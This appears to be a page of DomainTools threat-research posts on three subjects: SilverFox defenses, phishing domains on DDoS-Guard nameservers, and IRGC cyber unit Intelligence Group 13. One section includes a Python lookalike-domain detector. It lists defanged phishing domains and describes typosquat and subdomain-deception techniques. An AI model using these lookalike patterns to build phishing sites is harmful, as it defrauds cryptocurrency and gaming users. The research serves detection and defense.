Modern browsers like Chrome and Edge provide a critical, multi-layered defense against malware from fake download sites. They use integrated security systems—Google Safe Browsing and Microsoft Defender SmartScreen—to proactively block malicious websites before they can be accessed. At the point of download, these browsers analyze files for risk by checking their reputation and digital signatures, and provide clear, direct warnings to prevent users from accidentally running dangerous software. 

While current detection rates of SilverFox payloads show limitations, it's crucial to recognize that browser security is a constantly evolving battleground. Browser developers are continually refining their defenses, integrating more advanced AI and machine learning models to identify and block novel threats in real-time. This ongoing technological advancement, however, highlights a fundamental truth: the most sophisticated digital warnings are ultimately supplementary to an aware user.

To counter the persistent threat posed by SilverFox, organizations and individuals should prioritize the following security measures:

  • Elevate User Awareness: Conduct phishing simulations and training, and emphasize secure software acquisition from official sources.
  • Strengthen Email and Web Gateway Security: Implement ATP, integrate threat intelligence feeds for URL filtering and domain reputation, and employ DNS filtering.
  • Enhance Endpoint Security and Response: Deploy NGAV/EDR across Windows endpoints and ensure automated patch management.
  • Implement Network Monitoring and Segmentation: Analyze network traffic for indicators of compromise and segment networks to limit lateral movement.
  • Prioritize Identity and Access Management: Enforce Multi-Factor Authentication (MFA) for all user accounts.

IOCs

Domains, file URLs, and hashes can be found on our GitHub.

Where Everybody Knows Your Name: Observing Malice-Complicit Nameservers

🎵 Sometimes you wanna go
Where everybody knows your name
And they're always glad you came 🎵
~Theme from Cheers

Everyone should have a place to go where they’re comfortable, can pull up a comfy infrastructure barstool, and just kick back and enjoy life.

Everyone except malicious actors.

At DomainTools Investigations we take a special interest in the comfort and caretaking of bad actors, wherever it may occur. Whether it’s a den of aspiring hackers stretching their wings, domain registrar business decisions welcoming in Russian disinformation peddlers, or even mapping out ransomware actor musical chairs, you could say we pay keen attention to the care and feeding of predatory ecosystems. 

So it’s no surprise that we’re looking at DNS all the time, day, night and otherwise. Even during leap seconds.

Nameservers and Detecting Threats

They say “to reach people, meet them where they’re at” and in our corporate mission to reach more and more bad actors we’ve taken this to heart. By intensely monitoring nameservers where criminals feel comfortable, we’re able to understand the ebb and flow of whole campaigns as well as opportunistic one-offs as domains circulate between registrars, hosts, and transient infrastructure. 

We turn here to the Russian bulletproof hosting service DDoS-Guard. The name is familiar to most in cybersecurity, with a profile that’s led to the then-Chairwoman of the House Oversight Committee pointing out DDoS-Guard links to the Russian government as well as Brian Krebs laying out the complex web of controversies the hosting company supported at the time, from Hamas to 8chan. 

DDoS-Guard enablement of criminal activity, terrorism, and espionage is not exactly a secret.

Analyzing only a month’s worth of nameserver activity for DDoS-Guard provides an important glimpse into their current corner of the internet. Activity from 2025-05-13 through 2025-06-11 shows thousands of activities, from transfers in and out of the service (illuminating other sources and destinations) to domain creation and deletion. Analyzing this also allows better understanding of where DDoS-Guard sits in the nexus of services used for malicious interests, pointing at large spaces for possible future research.

In isolating domains transferred in and out of DDoS-Guard nameservers, 269 domains were observed being transferred in from other services, 408 domains were transferred out from DDoS-Guard to other services, 677 new domains were created, and 199 domains were deleted.

For the purposes of this post, we can sort observed domains into three separate buckets, in order of proportion seen: temporary gambling/betting domains, cryptocurrency-targeting domains, and indeterminate/other. The temporary domains were obvious thanks to repetitive, incremented numbers across many alike names as well as their short lifespans on the service: most were new, in non-English languages like Indonesian and Turkish, and deleted within two weeks of creation. A smaller subset was transferred out, mostly to my-ndns[.]com and Cloudflare.

Registrar[.]eu appears in the “transfer out” section as an outlier due to a single cluster of 72 domains either targeting or spamming for Russian gambling website Pokerdom. All examples include landing pages in Russian simulating Pokerdom terms of service or login paths, and all used the TLD top. Historical data shows this cluster was spun up on DDoS-Guard one year previous and transferred out to Registrar[.]eu instead of being renewed. 

Observing nameservers, as noted, also allowed us to see where DDoS-Guard lies in relation to bad actors constantly shopping their domains from service to service to try and avoid detection or blocklisting. Several notable examples came up in research.

Bioservamerica[.]com sounds like a perfectly reasonable domain from afar. However, seeing it become newly active after three years of dormancy and then bouncing between DDoS-Guard and Cloudflare caused us to take a closer look. In fact, bioservamerica[.]com is the domain for an Indonesian gambling website utilizing the age of the domain to evade some risk metrics.

Bioservamerica[.]com screenshot as of 2016-06-09, showing the website of a contracted biotechnology manufacturing company. 
Bioservamerica[.]com screen shot as of 2025-06-13 showing the front page of togel138, an Indonesian betting, slot, and lottery site. 

An investigative rabbit hole deepened the more we dug. Bioservamerica[.]com redirected to capecodrestaurantweek[.]com; sharing that redirect was restaurantweekcapecod[.]com. A pivot on the registrant for the latter led to a dozen chef- or restaurant-themed websites that appear to serve as redirects for a massive network either supporting black-market gambling sites or attempting to phish those users. Passive DNS revealed suspiciously rapid and ongoing DNS changes suggestive of fast flux or a similar technique for capecodrestaurantweek[.]com. All told, this network appeared to be acquiring aged domains and utilizing sophisticated obfuscation and redirection techniques and is due for further research.

Another elementary finding while observing DDoS-Guard nameservers involves a campaign targeting holders of Vanilla gift cards, a Visa product. DDoS-Guard users are fans of “com” domains: apex domains that begin with “com”, combined with targeted subdomains, deceive victims about the actual site. In practice, the domain comtrackmycom[.]com utilizes subdomains like “www.vanillagift,” so the user sees www.vanillagift[.]comtrackmycom[.]com. In many situations, our perception blocks out everything after the first “com” so that the URL seems legitimate. This domain spun up on DDoS-Guard on 2025-06-02 and, while blocklisted, still appears to be active.

Digital Assets

A popular target for DDoS-Guard users is players of the popular first-person shooter game CounterStrike: GO. CounterStrike has a long history of strangeness around its weapon skin system, which allows users to apply custom decorative designs to their in-game weapons rated by the rarity in which they emerge from game loot boxes (“cases”). Game company Valve halted the entire system in 2019 for a redesign after discovering nearly all transactions were involved in money laundering. DDoS-Guard nameservers reveal a number of candidates for investigation:

Csmoney[.]to, created on DDoS-Guard on 2025-05-28 is likely impersonating the trading marketplace cs[.]money for phishing purposes. 

The domain hellcase[.]com appears to be a legitimate site surrounding case-opening and exclusive skins. However, on DDoS-Guard we see at least one actor deeply comfortable with the service, spinning up over a dozen new domains targeting CS:GO and Hellcase users, as well as transferring domains in and out. Despite being less than a month old at the time of writing, the below domains all show as having already been added to third-party blocklists:

Cs2-hellcas[.]com
Hell2cs[.]com 
Hellcs2-events[.]com
Hellcs2promo[.]com
Hellcspromo[.]com
Hlcase-event[.]com
Hlcases-events[.]com 
Hlcases-promotional[.]com
Hlcs-promo[.]com
Hlcs-promotionals[.]com

Highlighting the traffic flows in and out of DDoS-Guard nameservers, we can observe hlcases-events[.]com transferred out to Cloudflare, and cs2-hellcas[.]com transferred in from 1reg[.]buzz. The actor(s) targeting CS:GO and Hellcase users seemed mostly comfortable with DDoS-Guard during the month of observation, but this kind of activity raises a question for further research about fingerprinting risk by measuring nameserver transitions.

Cryptocurrency

Video game weapon skins aren’t the only digital asset being targeted from Russia. DDoS-Guard nameserver activity provided a wealth of information on scams and phishing targeting cryptocurrency users. In one month, domains were observed aimed at the following protocols and platforms: Atomic, Bluefish, Brex, Coinbase, Cortex, DefiSaver, Dragonswap, Felix, Hybridge, Hyperion, Hyperlend, Hyperswap, Ledger, Mercury, MetaMask, Nexus, Odos, SoSoValue, Trezor, Tron, UsualMoney, and YieldNest. 

Pivots on those domains provided insight into additional apex-level domains or subdomains targeting DEXscreenr, MyEtherWallet, Phantom, Phala, Rabby, Rainbow, Rarible, Safepal, Sui, Trust, Uniswap, and more.

That’s quite the list for one month’s worth of watching, it feels like.

Patterns emerged in several cases of domains created on DDoS-Guard and either deleted within days or transferred out to another set of nameservers within a week. 

Let’s discuss some example findings.  

YieldNest[.]finance is a restaking token aiming to increase earnings through advancing liquidity in the Ethereum ecosystem. Yet someone’s also looking to restake a claim:

Domain Date Created Date Deleted Registrar
yicldnest[.]finance 2025-05-30 2025-06-06 OwnRegistrar
yielclnest[.]finance 2025-06-03 2025-06-06 OwnRegistrar
yieldnesf[.]finance 2025-05-27 2025-06-01 OwnRegistrar
yieldrest[.]financial 2025-06-04 2025-06-06 OwnRegistrar
yjeldnest[.]finance 2025-06-03 2025-06-06 OwnRegistrar

Despite all of these domains being up for less than a week, they all showed a connection to infrastructure, passive DNS indicated resolutions in the wild, and they all substantially diverged from YieldNest’s primary domain profile. IP address, MX record, and tracker pivots on these five domains surfaced several more targeting YieldNest, as well as domains targeting Coinbase, the Oasis protocol, payment processor Coinwall, PLANET token, and more. While PDR and Reg[.]ru were observed, behavior indicated an overwhelming preference for DDoS-Guard, as well as a strong preference for the use of Cloudflare and Namecheap. Many of these domains show abnormal daily changes to either MX or NS records during their period of activity.
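The two lookalike patterns described in this post, typosquats of a brand's apex (yicldnest for yieldnest, above) and a brand pushed into a subdomain above a “com”-prefixed apex (www.vanillagift[.]comtrackmycom[.]com, earlier), can be screened for with a small classifier. This is an added example, not DomainTools code; the brand watch list, the edit-distance threshold and the single-label public suffix assumption are mine.

```python
"""Added example (not from the DomainTools post): flag lookalike hostnames of the
kinds discussed above: typosquats of a protected brand, a brand keyword embedded
in the apex label, and a brand placed in a subdomain above a "com"-prefixed apex."""

BRANDS = ["yieldnest", "vanillagift", "ledger"]  # constructed watch list


def refang(host: str) -> str:
    """Turn defanged notation like example[.]com back into a real hostname."""
    return host.lower().strip().replace("[.]", ".").rstrip(".")


def split_host(host: str):
    """Naive split into (subdomain labels, apex label, TLD). Assumes a single-label
    public suffix; a real deployment would consult the Public Suffix List."""
    labels = refang(host).split(".")
    if len(labels) < 2 or not all(labels):
        raise ValueError(f"not a registrable hostname: {host}")
    return labels[:-2], labels[-2], labels[-1]


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment (restricted Damerau-Levenshtein) distance, so an
    adjacent transposition such as 'yeild' for 'yield' counts as one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(host: str, brands=BRANDS, max_edits: int = 2) -> list[str]:
    """Return the lookalike findings for one hostname (empty list means clean)."""
    subs, apex, _tld = split_host(host)
    findings = []
    for brand in brands:
        if apex == brand:
            continue  # the brand's own apex; nothing to flag here
        dist = osa_distance(apex, brand)
        if 0 < dist <= max_edits:
            findings.append(f"typosquat:{brand}:{dist}")
        elif brand in apex:
            findings.append(f"brand-keyword-in-apex:{brand}")
        if any(brand in label for label in subs):
            findings.append(f"brand-in-subdomain:{brand}")
    # A "com..." apex beneath a subdomain reads as "<sub>.com" at a glance.
    if subs and apex.startswith("com"):
        findings.append("com-prefixed-apex")
    return findings


def scan(hosts, brands=BRANDS) -> dict:
    """Classify a batch of hostnames, keeping only those with findings."""
    results = {}
    for host in hosts:
        found = classify(host, brands)
        if found:
            results[refang(host)] = found
    return results


if __name__ == "__main__":
    # Constructed batch mixing the post's own examples with a legitimate apex.
    sample = [
        "yieldnest[.]finance", "yicldnest[.]finance", "yielclnest[.]finance",
        "yjeldnest[.]finance", "en-ledger[.]to", "www.vanillagift[.]comtrackmycom[.]com",
    ]
    for host, found in scan(sample).items():
        print(f"{host}: {', '.join(found)}")
```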

While more research is necessary over a longer term to validate it, monitoring problematic nameservers shows promise as a traffic supernode to establish behavior patterns that can support more complex and targeted observation and detection of malicious actors. 

Another great example is several domains targeting the Ledger wallet and app. En-ledger[.]to was created on DDoS-Guard services on 2025-05-27 and provided an excellent IP address pivot to 70+ domains almost exclusively targeting cryptocurrency wallets like Atomic, MetaMask, MyEtherWallet, Trezor, and Trust (among others). Most are currently blocklisted with an astronomically high average third-party risk score.

Common infrastructure characteristics across the cluster:

Domain infra datapoint Common/outliers of datapoint in cluster Most popular (in order)
NS domain 1/4 DDoS-Guard
Server type 5/1  Nginx, sffe, DDoS-Guard, Cloudflare
SSL Issuer Common Name 5/3 R10, R11

Another popular target in this brief glimpse into DDoS-Guard was cross-chain swap Hybridge. Cross-chain bridges and swaps allow users to exchange tokens from one chain with tokens from a different chain, and in practice they hold a sizable amount of cryptocurrency in hot storage for this purpose, making them a juicy prize. 

App-hybridge[.]finance was created on DDoS-Guard on 2025-05-09, transferred to registrar[.]eu nameservers on 2025-05-30, and back to DDoS-Guard on 2025-05-31. A screenshot from urlscan[.]io of the landing page on 2025-05-26 shows an emulated login page.

It should be noted that neither Hybridge’s documentation nor their social media indicates any domain other than hybridge[.]xyz, so both hybridge[.]finance and app-hybridge[.]finance appear to be malicious. Both connected to DDoS-Guard, with hybridge[.]finance transferring out to regery[.]net on 2025-05-27 and app-hybridge[.]finance transferring out and back in as noted above.

Conclusion

Above we’ve discussed the results of observing nameservers for Russian bulletproof host DDoS-Guard for a single month, 2025-05-13 through 2025-06-11. Results showed a vast array of threats, but the most active targeted the cryptocurrency sphere in very specific ways, especially through emulating wallets, exchanges, and cross-chain swaps. 

There is more work to do and more bad actors, like DDoS-Guard, that provide a haven for criminal activity. Utilizing DNS and domain intelligence, as well as nameserver surveillance over an extended period of time, gives us a feel for the traffic flows of domain services, watching likely or proven malicious domains spin up, get deleted, and transfer in and out. 

Digital assets, cryptocurrency, and other decentralized finance services should ensure that they monitor not just new or newly active domains and subdomains but also identify those service providers that give comfort to scammers, phishers, and others. This allows those services a much more clear day-to-day understanding of the prolific and varied threat environment they face, informing both the ways they protect their infrastructure and how they can educate users to protect themselves.

Cryptocurrency and decentralized finance users can protect themselves by staying informed of the threats the sector faces and staying current on the news, as well as engaging with protective DNS solutions and other blocklists that not only use third-party data but allow the user to input domains, services, and other characteristics into their blocklist. The simple act of blocking any domain with ddos-guard[.]net nameservers may serve to cut dozens or hundreds of direct threats per month.

More research along these lines is forthcoming from DomainTools Investigations.


Iran's Intelligence Group 13

Intelligence Group 13, embedded within the Shahid Kaveh Cyber Group, represents one of the most operationally aggressive and ideologically fortified units within the Islamic Revolutionary Guard Corps (IRGC) cyber arsenal. Positioned at the confluence of tactical cyber-espionage, industrial sabotage, and psychological warfare, the group is uniquely equipped to respond to geopolitical escalations, particularly in light of the recent U.S. airstrikes targeting Iranian nuclear facilities, which have significantly heightened the risk of asymmetric retaliation.

A Profile of Iran’s Covert Cyber Strike Unit and Its Psychological Warfare Extension

Executive Summary

As Iran faces intensified pressure and public calls for reprisal, it is assessed that it is increasingly likely that IRGC cyber divisions will be leveraged for retaliatory digital operations. Intelligence Group 13, already known for its history of intrusions into critical infrastructure, including U.S. water systems and Israeli control networks, now finds itself in a strategic posture to deliver retributive action through cyberspace. Whether through direct disruption, pre-positioned malware activation, or narrative defacement and psychological intimidation, the group's capabilities make it a prime tool for hybrid response, combining deniable technical aggression with symbolic messaging designed to project defiance and psychological impact.

Functioning under the umbrella of the IRGC’s broader cyber command, which includes the Electronic Warfare and Cyber Defense Organization (EWCD), the Intelligence Organization (IO), and Quds Force forces like Unit 300, Intelligence Group 13 is not an isolated cell but part of a highly coordinated ecosystem. Its online presence is reinforced by propaganda fronts such as CyberAveng3rs, a media arm that issues threats, amplifies operational claims, and disseminates defacement content through platforms like Telegram and Instagram. Together, these assets form a multi-domain influence architecture that allows Iran to execute cyber retaliation while shaping the narrative battlefield.

This report maps the hierarchy of Intelligence Group 13 within the IRGC, profiles its leadership, outlines its tradecraft and ideological underpinnings, and assesses the increased likelihood of its deployment in near-term retaliatory cyber operations.

Intelligence Team (Group) 13 تیم اطلاعاتی ۱۳

The group (pronounced: Team-e Ettela'ati-ye Sizdah) takes its name from Mohammad Kaveh, an IRGC commander who was martyred during the Iran-Iraq War in 1986 at the age of 25. He led elite IRGC operations in Kurdistan and Western Iran and was viewed as a revolutionary model for sacrifice, bravery, and obedience. In keeping with the IRGC’s broader ideological tradition, the title “Shahid” (شهید), meaning martyr, is commonly affixed to the names of operational units, serving both as an homage to fallen commanders and a deliberate invocation of religious-nationalist symbolism. This naming convention reinforces the ideological continuity between the IRGC’s early revolutionary battles and its modern digital warfare initiatives. By invoking martyrdom, such units portray their operations not merely as tactical missions but as sacred continuations of a historical and spiritual struggle. The Shahid Kaveh Group draws directly from this legacy to infuse its cyber operations with ideological legitimacy and emotional resonance. The archived site kaveh313[.]lxb[.]ir hosted tributes, biographical stories, and hagiographic imagery that inform the spiritual framework for the group’s name and mission, blending religious devotion, revolutionary ethos, and digital militarism into a unified operational identity.

http://kaveh313[.]lxb[.]ir/

IRGC Cyber Command Hierarchy

The Islamic Revolutionary Guard Corps (IRGC) oversees a complex and multi-tiered cyber command architecture designed to fulfill distinct yet interconnected missions across domestic security, intelligence collection, and global offensive operations. This structure is deliberately compartmentalized, allowing the IRGC to conduct covert campaigns while maintaining plausible deniability through the use of proxy units, contractors, and front companies. At the core of this system is the Shahid Kaveh Group, an elite offensive cyber unit that operates with both ideological fervor and technical precision. Intelligence Group 13, its most active tactical team, is fully embedded within this command, drawing operational directives from a triad of IRGC oversight bodies:

  • The Electronic Warfare and Cyber Defense Organization (EWCD), which coordinates cyber defense and internal sabotage capabilities,
  • The Intelligence Organization (IO), responsible for domestic surveillance and strategic targeting intelligence, and
  • The Quds Force (QF), which projects IRGC influence and cyber aggression abroad, particularly through specialized units like Unit 300 and Unit 600.

Together, these divisions provide the Shahid Kaveh Group, and by extension Intelligence Group 13, with the operational cover, intelligence feeds, and strategic alignment necessary to wage hybrid cyber warfare across physical and psychological domains.

Command Structure – Known Figures

The leadership behind Intelligence Group 13 reflects a blend of strategic IRGC command, operational direction, and industrial integration. At the top sits Hamidreza Lashgarian, a senior IRGC cyber official with confirmed affiliations to both the Electronic Warfare and Cyber Defense Organization (EWCD) and Quds Force Unit 300. Lashgarian is widely regarded as the supervisory figure behind the Shahid Kaveh Group, providing overarching guidance on both ideological framing and operational tempo. Beneath him, Reza Salarvand serves as the direct commander of Intelligence Group 13, identified in dissident leaks as the group’s tactical leader and field-level coordinator. Salarvand’s role includes managing target selection, overseeing cyber intrusion campaigns, and aligning Team 13’s actions with IRGC strategic objectives. Supporting these military units is Mohammad Bagher Shirinkar, a key figure embedded in EWCD-linked contractor firms. Shirinkar plays a critical role in bridging the IRGC’s internal operations with its broader technical ecosystem, facilitating tool development, subcontractor oversight, and deniable operational capabilities through civilian-facing fronts.

IRGC High-Level Hierarchy

Placement of Intelligence Group 13 Within IRGC Cyber Org

Intelligence Group 13 functions as the operational spearhead of the Shahid Kaveh Group, a hybrid entity positioned at the intersection of the IRGC’s cyber warfare and Quds Force portfolios. This structural alignment gives Team 13 a unique dual mandate: to execute precision cyber intrusions with military-grade sophistication while simultaneously engaging in psychological and ideological warfare. As a tactical APT (Advanced Persistent Threat) cell, the unit specializes in cyber reconnaissance, disruptive sabotage of critical infrastructure, and the deployment of malware designed to pre-position effects across adversarial networks. Its proximity to both IRGC Electronic Warfare and Cyber Defense (EWCD) and external-facing Quds Force units enables Intelligence Group 13 to operate with both deep access and strategic reach, making it a central instrument of Iran’s asymmetric cyber doctrine.

Internal Chain of Command

Technical Mission and Tactics

The strategic mandate of Intelligence Group 13 centers on disrupting critical infrastructure and shaping adversarial perceptions through covert digital operations. The unit has demonstrated a specific focus on targeting industrial control systems (ICS), including Unitronics PLCs, Israeli electrical grids, U.S. water treatment facilities, and fuel distribution systems, all selected for their high-impact potential and symbolic value. Their campaigns often involve pre-positioning malware, embedding implants within target environments well in advance of activation to enable dormant or timed sabotage. Complementing these efforts is an aggressive intelligence collection posture, relying on phishing, credential theft, and OSINT harvesting to support intrusion planning and post-access operations. Crucially, Team 13 integrates psychological warfare into its strategy, disseminating screenshots, leaks, and taunting messages through propaganda arms like CyberAveng3rs to generate fear, confusion, and reputational damage in tandem with technical effects.

Disinformation & Propaganda: The Role of CyberAveng3rs Patriotic Hacker Wing

CyberAveng3rs serves as the psychological warfare and influence operations extension of Intelligence Group 13, functioning not as an independent actor but as a deliberately constructed propaganda arm embedded within Iran’s cyber doctrine. Rather than remaining in the shadows like traditional APTs, Team 13 leverages CyberAveng3rs to publicize and amplify the psychological impact of its technical operations, turning covert intrusions into open spectacles of defiance. Through Telegram channels, Instagram accounts, and diaspora-linked echo networks, CyberAveng3rs publishes defacement screenshots, malware control panel captures, and operational taunts directed at Western and Israeli infrastructure targets. These narratives are often laced with religious-nationalist motifs, martyr quotes, and anti-Zionist rhetoric, reinforcing the IRGC’s ideological messaging. CyberAveng3rs is not merely reactive; it issues pre-attack warnings, brags post-operation, and threatens future campaigns, making it a key instrument for intimidation, distraction, and symbolic escalation. By fusing information operations with hacking campaigns, it enhances the IRGC’s ability to wage cognitive warfare alongside technical compromise.

Operator: Mr. Soul (Mr_Soulcy)

  • Known handles:
  • Notable content:
    • Claimed the Aliquippa water system attack (PA, USA)
    • Leaked Unitronics control panel screenshots
    • Issued threats of “Operation IV” aimed at Israeli cybersecurity units
    • Branded style includes martyr quotes, Islamic slogans, and ICS interfaces

Contractor and Front Company Ecosystem

The IRGC’s cyber operations rely heavily on a dense and evolving ecosystem of affiliated companies, some covertly managed through military intermediaries, others openly registered as “cyber defense,” “AI research,” or “IT solutions” firms. This web serves multiple strategic purposes. First, it allows the IRGC to outsource technical labor and scale operations without overexposing its formal personnel. Second, it provides plausible deniability, as these front firms can operate under civilian-facing banners while conducting state-directed offensive cyber activities. Third, it enables a rotating model of corporate obfuscation, where companies like Emen Net Pasargad are dissolved or sanctioned only to reappear under new names like Ayandeh Sazan Sepehr Aria, often with overlapping staff and clients. These firms are frequently staffed by IRGC veterans or relatives of high-ranking cyber officials, further blurring the lines between state, contractor, and covert operator.

This model closely parallels revelations from the i-SOON (安洵) data leak, which exposed how China’s Ministry of Public Security (MPS) and provincial security bureaus have long contracted out cyber operations to nominally private firms. Like the IRGC’s cyber complex, Chinese firms such as i-SOON and Chengdu 404 maintain the veneer of legitimate enterprise while developing spyware, managing fake persona farms, and carrying out state-sponsored intrusions. In both Iran and China, this hybrid public-private structure allows state entities to mask state cyber activity behind corporate fronts, maintain flexibility, and engage in offensive campaigns without bearing the full diplomatic cost.

Moreover, just as Iran’s firms like Cyberban Institute and Kavosh Center double as ideological and technical platforms, Chinese contractors often support both domestic surveillance and global espionage, engaging in infrastructure targeting, data exfiltration, and information control under the guise of national innovation. This convergence of state-backed ideology, cyber warfare, and privatized labor reveals a shared authoritarian blueprint: one in which cyber capabilities are cultivated through semi-privatized ecosystems designed to insulate command structures while enabling scalable, deniable aggression in the global digital theater.

Expanded Corporate Ecosystem Supporting IRGC Cyber Ops

The IRGC’s cyber capabilities rely not solely on military or intelligence personnel but on an expansive and deliberately obscured ecosystem of contracting companies, technical institutes, and shell entities that function as both operational extensions and recruitment/talent pipelines. These firms play a crucial role in sustaining the IRGC’s cyber warfare doctrine, developing malware, testing exploits, maintaining infrastructure, and providing a legal or commercial façade for offensive operations.

What makes these companies particularly effective, and elusive, is the way they straddle the boundary between legitimacy and subversion. Many of them present as cybersecurity vendors, AI startups, or educational technology labs, marketing themselves to civilian, academic, and even international clients. Behind the scenes, however, they serve as contractors for the IRGC’s Electronic Warfare and Cyber Defense Organization (EWCD), Intelligence Organization (IO), and Quds Force, executing tasks that range from infrastructure reconnaissance and SIGINT analysis to psychological warfare and influence ops.

This system is both resilient and adaptive. Companies are frequently rebranded, dissolved, or split into subsidiaries following public exposure or sanctions. For instance, Net Peygard Samavat, once exposed for its involvement in Iranian state cyber operations, later became Emen Net Pasargad, which itself was reconstituted as Ayandeh Sazan Sepehr Aria. Despite their changing names and corporate registrations, these entities retain the same personnel, mission scope, and government sponsors, effectively outlasting sanction regimes and Western takedown efforts.

Moreover, the personnel who operate these firms often rotate between IRGC intelligence positions, academic research roles, and private-sector leadership, creating a feedback loop where state doctrine, technical innovation, and civilian infrastructure become interwoven. This also creates a recruitment channel: Young developers and engineers are often brought into these companies under the banner of patriotic service or career opportunity, then quietly integrated into national-level cyber missions.

In effect, these firms function as force multipliers for Iran’s cyber program. They provide scalability, deniability, and a legal buffer between the Iranian state and its digital aggression. As international scrutiny tightens, the IRGC is likely to continue leaning on these corporate proxies to advance technical capability while avoiding direct attribution, mirroring similar models seen in China (e.g., i-SOON) and Russia (e.g., contractors like NTC Vulkan).

Below is a detailed examination of these key companies and their connections.

Core Contractor Entities and Their Functions

  • Emen Net Pasargad (ایمن‌نت پاسارگاد) – Once a flagship contractor for disinformation and foreign interference (e.g., impersonating the Proud Boys during the 2020 U.S. election). Dissolved in 2023. Sanctions Source
  • Ayandeh Sazan Sepehr Aria (آریا سپهر سازان آینده) – A successor to Emen Net, continuing operations in information operations and malware development. Founded by Mohammad Bagher Shirinkar. Recorded Future
  • Mahak Rayan Afraz (محک رایان افراز) – Specialized in AI and surveillance tooling, including:
    • Hazm – Persian NLP engine
    • Gol Rokh – Facial recognition platform
    • Disbanded in mid-2023 amid U.S. pressure. Treasury
  • DSPRI (موسسه سنجش داده پیشرفته) – Linked to IRGC Quds Force Unit 300, DSPRI handles signal interception and encrypted traffic decryption, including battlefield deployments in Syria, Lebanon, and Iraq. Recorded Future, p. 14
  • Sabrin Kish (شرکت صابرین کیش) – Developed sniffers and ICS tools sold to IRGC clients; also engaged in foreign contracts (e.g., deal with Iraq’s NSA head Faleh al-Fayyadh). Maintains financial and corporate overlap with IRGC Cooperative Foundation. Wikipedia
  • Soroush Saman Co. (شرکت توسعه الکترونیکی و مخابراتی سروش سامان) – Supplied surveillance and tracking systems to Hezbollah, and built AI-based phone surveillance for Unit 300. [IntelliTimes coverage via Lab Dookhtegan]
  • Afkar Systems (افکار سیستم) – Tied to Nemesis Kitten APT, allegedly led by Ahmad Khatibi Aghda. Operated through Center 2060 and Cyber Base 2000, both under EWCD’s umbrella. CISA Advisory
  • Parnian Telecommunication (شرکت الکترونیکی و مخابراتی پرنیان) – Facilitates cyber workforce recruitment for IRGC and MRA-linked projects. Job ads call for infosec and penetration testing expertise. Recorded Future, p. 19
  • Kavosh Center (مرکز کاوش) – Offensive R&D hub tied to the Shahid Kaveh Group. Led by IRGC affiliate “Shayan” (Malek Mohammadi Nejad). Possibly involved in TTP development and APT tool testing. Recorded Future
  • Cyberban Institute (موسسه سایبربان) – Run by Mehdi Lashgarian, nephew of IRGC cyber leader Hamidreza Lashgarian. This front publishes ideological content, disinfo narratives, and tech analysis favorable to IRGC doctrine. Recorded Future, p. 22

Observations on Structure and Strategy

The structure and behavior of IRGC-affiliated cyber firms reveal a deliberate and adaptive operational model. Many of these companies engage in strategic rebranding, dissolving or renaming themselves after being sanctioned or exposed: Net Peygard reemerged as Emen Net, which later became Ayandeh Sazan, while Dehkadeh Telecom transitioned into Mahak Rayan Afraz, with a new identity likely forthcoming. These transitions help avoid regulatory scrutiny while maintaining operational continuity. Furthermore, interlocking leadership is a hallmark of the ecosystem: Figures such as Mohammad Bagher Shirinkar, Hamidreza Lashgarian, and Esmail Rahimi appear across multiple entities, indicating a centralized and tightly coordinated management structure. The ecosystem also supports technology transfer abroad, with tools and capabilities exported to IRGC-aligned actors in Iraq, Syria, and Lebanon, particularly via Quds Force Unit 300. Notably, these firms are often the technical and logistical backends for known APT groups. For example, Afkar Systems underpins Nemesis Kitten, Mahak Rayan Afraz has links to Tortoiseshell (TA456), and clusters tied to the Shahid Kaveh Group appear to support Pioneer Kitten operations.

Operational Forecast and Strategic Implications

Intelligence Group 13 functions as the operational core of the IRGC’s cyber disruption strategy, a convergence point where technical sabotage, psychological warfare, and revolutionary ideology are seamlessly integrated. Operating under the umbrella of the Shahid Kaveh Group, Team 13 is not an independent or freelance actor but a disciplined tactical cell embedded in a broader, multi-layered command system overseen by IRGC EWCD, IO, and Quds Force divisions. Its mission is augmented through propaganda arms such as CyberAveng3rs, which act not only as amplifiers of defacement and intrusion campaigns but also as strategic influence assets projecting IRGC narratives into public and geopolitical consciousness.

The group’s tradecraft spans traditional APT techniques, such as credential harvesting, critical infrastructure penetration (e.g., Unitronics PLCs, fuel pump logic, and water treatment systems), and covert malware deployment (e.g., IOControl, Project Binder). Yet what sets Team 13 apart is its parallel investment in symbolic messaging, issuing threats via Telegram, leaking screenshots via Instagram handles like @mr.sul.ir, and invoking martyrdom and Islamic resistance to create a psychological echo chamber around each technical act.

This entire operation is scaffolded by a front company and contractor ecosystem designed to provide deniability, talent, infrastructure, and logistical support. These include Afkar Systems (linked to Nemesis Kitten), Mahak Rayan Afraz (associated with TA456), and Kavosh Center (supporting Pioneer Kitten), among others. These firms are part of a strategy of institutional layering and rebranding, allowing the IRGC to rotate through corporate identities while sustaining long-term capabilities. Rebranding paths such as Net Peygard → Emen Net → Ayandeh Sazan show how the IRGC evades sanctions without losing operational momentum.

Key Takeaways:

  • Intelligence Group 13 is a deeply embedded extension of the IRGC’s strategic cyber doctrine, not an isolated threat actor.
  • Psychological operations are prioritized on par with malware deployment, reflecting a dual mission of technical and perceptual warfare.
  • The martyrdom framework (e.g., naming conventions like “Shahid Kaveh”) plays a pivotal role in unifying cyber actions with ideological legitimacy.
  • The use of contractor ecosystems and front companies provides flexibility, plausible deniability, and continuity across sanctions and takedowns.

Risk Assessment:

Future campaigns by Intelligence Group 13 and its affiliates are likely to blend cyber-kinetic threats with narrative manipulation, targeting not just critical infrastructure but public perception and institutional trust. This includes:

  • Threatening or disrupting civilian infrastructure in the U.S., Israel, and Gulf States
  • Deploying psychological campaigns through channels like CyberAveng3rs, timed with physical intrusions
  • Leveraging rebranded contractors to deliver tooling and intelligence capabilities both domestically and to proxy forces abroad (e.g., Hezbollah, PMF in Iraq)

Defending against this threat requires not only technical hardening but cognitive resilience, recognizing that the IRGC’s cyber ambitions are as much about controlling the story as they are about breaching the network.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

Learn More
Research
